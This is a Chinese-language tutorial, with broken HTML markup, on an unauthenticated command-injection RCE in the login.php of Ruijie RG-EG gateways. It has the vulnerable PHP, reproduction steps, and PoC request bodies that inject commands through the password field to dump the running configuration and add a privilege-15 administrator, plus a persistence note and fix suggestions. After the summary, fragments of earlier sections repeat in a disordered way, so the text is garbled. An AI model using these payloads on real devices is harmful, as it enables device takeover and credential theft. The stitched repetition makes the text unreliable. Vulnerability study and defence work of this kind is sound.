锐捷前台无条件RCE漏洞分析与复现教学文档<\/h1>

漏洞概述<\/h2>
本漏洞存在于锐捷RG-EG系列出口网关的WEB管理端中，是一个前台无条件命令执行漏洞。攻击者无需任何认证即可通过构造特殊的请求参数，在设备上执行任意命令，获取设备敏感信息甚至完全控制设备。<\/p>

漏洞分析<\/h2>

1. 漏洞位置<\/h3>
漏洞位于`login.php<\/code>文件中，具体在登录功能处理逻辑部分。<\/p>`

2. 漏洞成因<\/h3>
根本原因是开发者未对用户输入进行有效过滤，直接将用户可控参数拼接到设备命令中执行，导致命令注入。<\/p>
3. 漏洞触发流程<\/h3>

用户提交用户名和密码到login.php<\/code><\/li>
程序将用户名和密码拼接到webmaster<\/code>命令中<\/li>
通过execCli()<\/code>函数执行拼接后的命令<\/li>
由于无过滤，攻击者可在密码参数中注入额外命令<\/li>
<\/ol>
4. 关键代码分析<\/h3>
\/\/ login.php中的登录处理逻辑
<\/span><\/span><\/span><\/span>$username =<\/span> $_POST['username'<\/span>];
<\/span><\/span>$password =<\/span> $_POST['password'<\/span>];
<\/span><\/span>
<\/span><\/span>\/\/ 执行webmaster命令验证登录
<\/span><\/span><\/span><\/span>$res =<\/span> execCli<\/span>('exec'<\/span>, "webmaster <\/span>$username<\/span> <\/span>$password<\/span>"<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ execCli函数定义
<\/span><\/span><\/span><\/span>function<\/span> execCli<\/span>($mode, $command, $answer) {
<\/span><\/span>    \/\/ 参数检查
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ 通过php cli模块执行命令
<\/span><\/span><\/span><\/span>    php_exec_cli<\/span>($mode, $command, $answer);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞复现<\/h2>
1. 环境准备<\/h3>

目标设备：锐捷RG-EG系列出口网关<\/li>
测试工具：Burp Suite或类似HTTP代理工具<\/li>
<\/ul>
2. 复现步骤<\/h3>

拦截登录请求（通常为POST请求到login.php<\/code>）<\/li>
修改请求参数，构造恶意payload<\/li>
发送请求并观察响应<\/li>
<\/ol>
3. PoC构造<\/h3>
基本payload格式：<\/p>
username=任意值&password=原密码?[注入的命令]
<\/code><\/pre>
示例payload：<\/p>
username=test&password=123?show version
<\/code><\/pre>
4. 常见可利用命令<\/h3>

查看设备信息：show version<\/code><\/li>
查看配置：show running-config<\/code><\/li>
查看用户：show user<\/code><\/li>
查看接口信息：show interface<\/code><\/li>
<\/ul>
漏洞利用<\/h2>
1. 信息收集<\/h3>
username=test&password=123?show running-config
<\/code><\/pre>
可获取设备完整配置信息，包括密码hash等敏感数据。<\/p>
2. 权限提升<\/h3>
通过修改配置或添加管理员用户实现权限提升：<\/p>
username=test&password=123?configure terminal
username=test&password=123?username admin privilege 15 secret mynewpassword
<\/code><\/pre>
3. 持久化控制<\/h3>
可通过修改启动配置或创建计划任务实现持久化访问。<\/p>
防御措施<\/h2>
1. 临时缓解<\/h3>

限制WEB管理界面访问来源<\/li>
修改默认密码<\/li>
<\/ul>
2. 根本修复<\/h3>

对用户输入进行严格过滤和验证<\/li>
使用参数化查询而非字符串拼接<\/li>
实现最小权限原则，限制WEB进程权限<\/li>
对敏感操作增加二次认证<\/li>
<\/ul>
3. 代码修复建议<\/h3>
\/\/ 修复后的代码示例
<\/span><\/span><\/span><\/span>function<\/span> sanitizeInput<\/span>($input) {
<\/span><\/span>    return<\/span> preg_replace<\/span>('\/[^a-zA-Z0-9]\/'<\/span>, ''<\/span>, $input);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$username =<\/span> sanitizeInput<\/span>($_POST['username'<\/span>]);
<\/span><\/span>$password =<\/span> sanitizeInput<\/span>($_POST['password'<\/span>]);
<\/span><\/span>
<\/span><\/span>\/\/ 或者使用预定义命令模板
<\/span><\/span><\/span><\/span>$command =<\/span> sprintf<\/span>('webmaster %s %s'<\/span>, 
<\/span><\/span>    escapeshellarg<\/span>($username),
<\/span><\/span>    escapeshellarg<\/span>($password)
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>漏洞影响<\/h2>

CVSS评分：9.8 (Critical)<\/li>
影响范围：所有使用相同登录逻辑的锐捷RG-EG系列设备<\/li>
潜在危害：

完全控制网络设备<\/li>
获取内网拓扑信息<\/li>
作为跳板攻击内网其他设备<\/li>
修改网络配置导致服务中断<\/li>
<\/ul>
<\/li>
<\/ul>
总结<\/h2>
该漏洞展示了网络设备WEB管理界面常见的安全问题，强调了输入验证的重要性。开发人员应避免直接将用户输入拼接到系统命令中，而应使用安全的API或严格的输入过滤机制。对于渗透测试人员，此类设备往往隐藏着高危漏洞，值得重点关注。<\/p>

锐捷前台无条件RCE漏洞分析与复现教学文档<\/h1>

漏洞概述<\/h2> 本漏洞存在于锐捷RG-EG系列出口网关的WEB管理端中，是一个前台无条件命令执行漏洞。攻击者无需任何认证即可通过构造特殊的请求参数，在设备上执行任意命令，获取设备敏感信息甚至完全控制设备。<\/p>

漏洞分析<\/h2>

1. 漏洞位置<\/h3> 漏洞位于login.php<\/code>文件中，具体在登录功能处理逻辑部分。<\/p>

漏洞复现<\/h2>

漏洞利用<\/h2>

3. 持久化控制<\/h3> 可通过修改启动配置或创建计划任务实现持久化访问。<\/p>

防御措施<\/h2>

漏洞概述<\/h2>
本漏洞存在于锐捷RG-EG系列出口网关的WEB管理端中，是一个前台无条件命令执行漏洞。攻击者无需任何认证即可通过构造特殊的请求参数，在设备上执行任意命令，获取设备敏感信息甚至完全控制设备。<\/p>

1. 漏洞位置<\/h3>
漏洞位于`login.php<\/code>文件中，具体在登录功能处理逻辑部分。<\/p>`

3. 持久化控制<\/h3>
可通过修改启动配置或创建计划任务实现持久化访问。<\/p>